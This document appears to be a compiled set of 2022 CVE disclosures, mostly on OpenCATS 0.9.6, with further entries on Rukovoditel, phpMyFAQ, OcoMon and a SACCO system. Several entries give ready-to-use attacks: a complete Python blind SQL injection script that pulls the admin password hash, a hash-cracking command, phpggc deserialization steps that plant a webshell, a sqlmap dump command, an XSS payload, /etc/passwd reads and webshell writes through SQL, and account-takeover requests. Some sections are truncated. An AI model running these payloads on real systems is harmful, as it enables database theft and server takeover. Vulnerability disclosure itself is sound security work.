OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the entriesPerPage variable.

**SQL injection vulnerability in OpenCats 'Job Orders'**

OpenCats version 0.9.6 PHP7.2 suffers from SQL injection vulnerability. This allows attackers control over the application's database.

User has control over entriesPerPage variable, which allows SQL injection in UPDATE statement, setPipelineEntriesPerPage function call.

SQL query code:

Since UPDATE statement is used to query the database, user can add arbitrary values to arbitrary columns inside 'user' table. Knowing this, it is possible to craft payload like: 15,first_name=(select password from user where user_id=1 limit 1)

This will update 'first\_name' with arbitrary data from database. In this example user's password hash will be written inside first\_name column. Since, first name is reflected in many endpoints in application, this means malicious person can exfiltrate data and control the database using it as a field to extract data. Attackers can also use blind sql injection techniques to extract db information.

CVE-2022-43021: opencats_zero-days/SQLI_JobOrders.md at main · hansmach1ne/opencats_zero-days

OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the tag_id variable in the Tag update function.

**SQL injection vulnerability in OpenCats 'Tag' update functionality.**

OpenCats version 0.9.6 PHP7.2 suffers from SQL injection vulnerability. This allows attackers control over the application's database.

User has control over tag\_id variable, which allows SQL injection in UPDATE statement via time-based/blind techniques.

Application builds the following query:  
UPDATE tag SET title = 'Title', description = 'Description' WHERE tag_id = XXX AND site_id = 1;

User has control over XXX part.

1337 OR 1337=(select IF(substr(database(),1,1)='a',(select sleep(3)), (select sleep(1)))))

With this payload, application will sleep for 3 seconds for every entry inside original table if the database() query result starts with 'a', otherwise it will sleep for one second.

With this time-based blind technique, attacker is able to exfiltrate any information from the database by querying many YES/NO questions to the database and intelligently measuring response times.

**POC**

This proof of concept exfiltrates administrator user's password hash:  
(select password from user where user_id=1)

**Bonus, let's crack the hash**

echo "password:21232f297a57a5a743894a0e4a801fc3" > hash.txt  
john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 hash.txt

**xploit.py!**

import requests
import string
import sys

def inRange(rTime, averageTime, sleepAmount):
    if(rTime \> sleepAmount and rTime < rTime + (averageTime\*20/100) and rTime \> rTime \- (averageTime\*20/100)):
        return True
    else: return False

headers \= {}
proxies \= {}
#proxies\["http"\] = "http://127.0.0.1:8080"

#Login and get session cookie..
#Change this
headers\["Cookie"\] \= "CATS=cl2201l24aihqlnch0jgnr4pd2"
url \= "http://192.168.203.135/opencats/index.php?m=settings&a=ajax\_tags\_upd"

#Prepare Content-Type for POST request compability
headers\["Content-Type"\] \= "application/x-www-form-urlencoded"
#Prepare POST parameter 'tag\_id'
postdata \= "tag\_id=PWN&tag\_title=test"

#Change this depending on the endpoint
tempPayload \= "1 OR 1=(sleep(3))"

print("Sending few request to determine average response time...")

timeSum \= 0
numberOfBaselineRequests \= 5
for i in range(numberOfBaselineRequests):
    try:
        rTest \= requests.post(url, headers \= headers, data\=postdata.replace('PWN','1337'), proxies \= proxies) 
        timeSum  += rTest.elapsed.total\_seconds()
        if('<form name="loginForm"' in rTest.text):
            print("Session cookie not valid, change it inside .py")
            sys.exit(\-1)
    except:
        print("Some exception ocurred while sending or receiving data from the application. Make sure IP is good. Exiting..")
        sys.exit(\-1)

averageTime \= timeSum/numberOfBaselineRequests
print("Average response time for " + str(numberOfBaselineRequests) + " requests is : " + str(averageTime))

print("\\nTrying to inject sleep(3)")
r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',tempPayload), proxies \= proxies)
rTime \= r.elapsed.total\_seconds()
print("Response time: " + str(rTime))

if(inRange(rTime, averageTime, 3)):
    print("\\n\[+\] Application is vulnerable to SQL injection...")

#Getting value for false statement -> sleep(1)
tempPayload2 \= "1 or 1=(sleep(0.1))"
r2 \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',tempPayload2), proxies \= proxies)
t\_sleep\_one \= r2.elapsed.total\_seconds()

tempPayload3 \= "1 or 1=(sleep(0.3))"
r3 \= requests.post(url, headers \= headers, data\=postdata.replace('PWN', tempPayload3), proxies \= proxies)
t\_sleep\_three \= r3.elapsed.total\_seconds()

print("False statement time: " + str(t\_sleep\_one))
print("True statement time: " + str(t\_sleep\_three) + "\\n")

length \= 0
exfilQuery \= "1 OR 1=(IF(length((select password from user where user\_id=1))='XXX',sleep(0.3),sleep(0.1)))"
#Determine length of the result that we want. i.e select passwrod from user query...
print("Determining the result length of our query...")

while(True):
    q \= exfilQuery.replace('XXX', str(length))
    r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN', q))
    time \= r.elapsed.total\_seconds()

    #If sleep(3) gets executed, we have correct length
    if(time \> (t\_sleep\_one+(t\_sleep\_one\*20/100))):
        print("Got length " + str(length))
        break
    
    length += 1
    if(length \== 1000):
        break
    
if(length \== 0 or length \== 1000):
    print("Something is wrong. Exiting...")
    sys.exit(\-1)
else: print("Length of '(select password from user where user\_id=1)' query: " + str(length))

#OK----|
alphanumerics \= list(string.ascii\_lowercase + string.digits)
exfilQuery \= "1 OR 1=(IF(substr((select password from user where user\_id=1),YYY,1) = 'XXX',sleep(0.3), sleep(0.1)))"

data \= \[\]
print("Exfiltrating data. Query: (select password from user where user\_id=1). Patience...")

for i in range(length):
    for item in alphanumerics:
        q \= exfilQuery.replace('XXX',str(item))
        q \= q.replace('YYY',str(i+1))
        r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',q), proxies \= proxies)
        time \= r.elapsed.total\_seconds()
        #print(str(time) + "\\n")
        if(time \> (t\_sleep\_one+(t\_sleep\_one\*20/100))):
            print(str(i+1) + ". Letter = " + item)
            data.append(item)
            break

print("(select password from user where user\_id=1) -> " + "".join(data))

CVE-2022-43020: opencats_zero-days/SQLI_in_Tag_Updates.md at main · hansmach1ne/opencats_zero-days

OpenCATS v0.9.6 was discovered to contain a remote code execution (RCE) vulnerability via the getDataGridPager's ajax functionality.

**Remote Code Execution via insecure deserialization in OpenCats getDataGridPager's ajax functionality.****Vulnerable code**

**How to achieve command execution**

Useful information: OpenCats uses Guzzle, it can be used as a gadget chain.  
It is possible to craft serialized object using phpggc tool, that has Guzzle gadget chain predefined.

1.  Create payload that will be executed. I will use phpinfo().  
    echo "<?php phpinfo(); ?>" > /tmp/shell.php
    
2.  Create serialized payload with phpggc that will upload malicous shell to provided directory on web server.  
    ./phpggc -u --fast-destruct Guzzle/FW1 /var/www/html/opencats/pwned.php /tmp/shell.php
    

3.  Copy the payload inside 'p' parameter.  
    /ajax.php?f=getDataGridPager&i=1&p=PAYLOAD_FROM_PREVIOUS_STEP

4.  Execute webshell.

Ending notes. Upload location might vary from system to system, depending if www-data has write permission to web server's root directory. In case / (web server's root) is not writeable, upload a webshell to '/upload/pwned.php' instead.

CVE-2022-43019: opencats_zero-days/RCE_via_deserialisation.md at main · hansmach1ne/opencats_zero-days

OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the importID parameter in the Import viewerrors function.

Permalink

Cannot retrieve contributors at this time

**SQL injection vulnerability in OpenCats 'Import viewerrors' functionality.**

OpenCats version 0.9.6 PHP7.2 suffers from SQL injection vulnerability. This allows attackers control over the application's database.

User has control over data that gets passed inside SQL query, which allows SQL injection in SELECT statement via GET 'importID' parameter.

#Poc Decided to test this with sqlmap. Let's exfiltrate username and password hashes from the database.

    sqlmap -u "http://192.168.203.135/opencats/index.php?m=import&a=viewerrors&importID=1" --cookie="CATS=cl2201l24aihqlnch0jgnr4pd2" -T user -C user_id,user_name,password -p "importID" --flush-session --dump
    

04.10.2022\_00.44.40\_REC.mp4

CVE-2022-43023: opencats_zero-days/SQLI_imports_errors.md at main · hansmach1ne/opencats_zero-days

A cross-site request forgery (CSRF) vulnerability in Jenkins Katalon Plugin 1.0.33 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

CVE-2022-43418: security - Multiple vulnerabilities in Jenkins plugins

A stored cross-site scripting (XSS) vulnerability in the Configuration/Holidays module of Rukovoditel v3.2.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter.

/Describe the bug/  
I downloaded and install rukoviditel 3.2.1  
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "name" parameter in Configuration/Holidays module.

To Reproduce  
/Steps to reproduce the behavior/:

1, Login into the panel  
2\. Go to '/ukovoditel/index.php?module=holidays/holidays/'  
3\. Add new info  
4\. Insert payload: "><img src=xx onerror=alert ('document.domain) >  
5\. Save Alert XSS Message

/Expected behavior/  
The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page.

/Screenshots/

CVE-2022-43185: Stored XSS Vulnerability on "name" parameter in Rukovoditel-3.2.1 · Issue #1 · Kubozz/rukovoditel-3.2.1

Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.2.0-alpha.

**Description**

phpmyfaq has a feature to restore from a backup the entire application. An attacker with admin grant can export the configuration and re-upload the same file bypassing all the backend sanitization and controls.

**Proof of Concept XSS**

1.  *   login as admin
2.  *   go to backup page
3.  *   Create a backup and download it
4.  *   Edit or add some query to file
5.  *   in this case i edited the content of a category in order to fire an XSS on the admin panel or homepage
6.  *   navigate some page and see the xss (homepage, list categories etc).

PoC-Payload: 

#MISCONF

In case of misconfiguration of the SQL service user grant. An attacker could abuse of that by reading/write sensitive file.

Example (read file grant) 1:

*   Read ssh keys, or passwd etc...

    SELECT LOAD_FILE('/etc/passwd') 
    

Example (write file grant) 2:

*   write a php shell file in the root of the server web (the path is discovered from the system information-> Server Document Root)

    SELECT  'some php code '  INTO dumpfile '/sitepath/somefile.php'
    

**Impact**

This vulnerability allow an attacker to take control of the entire database and in some cases read arbitrary file or execute shell commands by writing malicious php file.

CVE-2022-3608: Stored XSS and possible RCE/LFI in case of misconfiguration  in phpmyfaq

OcoMon 4.0RC1 is vulnerable to Incorrect Access Control. Through a request the user can obtain the real email, sending the same request with correct email its possible to account takeover.

**Description**

Through password recovery its possible to obtain a **token** to reset password of any user.

**Bug - 1**

The vulnerability occurs because the application validates the email in database and returns the real email to the user.

**Bug - 2**

If username and email are valid, the application returns to user the link to reset the password instead of sending it by email.

**PoC**

*   Access "Esqueci minha senha:

*   Enter a valid username (**example: admin**) and a fake email.
*   The user's real email will be exposed in the response:

*   Send the request again replacing the fake email to user original email:

*   In the request response have the link to change the user's password, just access and change:

**Examples:**

    URL: https://ocomon.site/includes/common/require_access_recovery_process.php
    
    DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&email=anything@email.com&action=require_recovery
    
    RESPONSE: "action":"require_recovery","field_id":"email","login_name":"admin","email":"anything@email.com","user_id":"1","name":"Administrador do Sistema","mail_to":"realemail@email.com"}
    

    URL: https://ocomon.site/includes/common/require_access_recovery_process.php
     
    DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&email=realemail@email.com&action=require_recovery
     
    RESPONSE: "action":"require_recovery","field_id":"","login_name":"admin","email":"realemail@email.com","user_id":"1","name":"Administrador do Sistema","mail_to":"realemail@email.com","rand":"b39abfbd697e566d178e678462b0b6c1","forget_link":"https:\/\/ocomon.site\/setNewPass.php?code=1|b39abfbd697e566d178e678462b0b6c1"}
    

**FIX**

https://ocomonphp.sourceforge.io/downloads/

CVE-2022-40798: CVE-2022-40798 - OcoMon Account Takeover

Open Source SACCO Management System v1.0 vulnerable to SQL Injection via /sacco_shield/manage_loan.php.

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: 足够努力。

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/manage\_loan.php

Vulnerability location: /sacco\_shield/manage\_loan.php?id=, id

dbname = sacco,length=5

\[+\] Payload: /sacco\_shield/manage\_loan.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10--+ // Leak place ---> id

GET /sacco\_shield/manage\_loan.php?id\=\-1%20union%20select%201,2,3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-42218: bug_report/SQLi-1.md at main · CNchenjiabao/bug_report

Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Tag

#php